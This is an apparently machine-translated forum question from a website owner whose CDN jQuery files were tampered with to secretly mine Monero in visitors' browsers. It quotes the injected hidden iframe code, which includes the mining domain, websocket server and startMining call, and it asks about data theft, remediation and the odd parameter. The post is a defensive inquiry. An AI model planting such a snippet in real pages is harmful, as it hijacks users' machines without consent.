Ho notato che recentemente il nostro sito Web ha avuto scarso rendimento e spesso utilizza il 100% di utilizzo della CPU sulle macchine degli utenti. Dopo aver esaminato ciò, ho notato che tutti i file jQuery sul nostro CDN sono stati modificati 6 giorni fa e ora stanno estraendo il lato client Monero quando le persone visualizzano il nostro sito Web.
Il seguente iframe viene caricato sulla nostra pagina:
<iframe src="https://www.jqr-cdn.download/lot.html"style="width: 0px; height: 1px;">
<html>
<head></head>
<body>
<script src="jquery-3.3.1.js"></script>
<script>
server = "wss://www.jqr-cdn.download:8190";
startMining("minexmr.com","winner winner chicken dinner");
</script>
</body>
</html>
I penso questo è dovuto al fatto che il nostro S3 sia pubblicamente scrivibile (dovrò esaminarlo)
Le mie domande sono:
È appena stato un leech della CPU, o qualsiasi altra cosa nefasta si verifica attraverso questo metodo di attacco (raccolta dei dati, ecc.)
Chiudendo il nostro S3 e sovrascrivendo i file con copie originali risolverà il problema, se così fosse lo risolverà in modo permanente?
Qual è il significato del parametro "cena del vincitore del pollo", si tratta di un nome utente, solo una provocazione o qualcos'altro?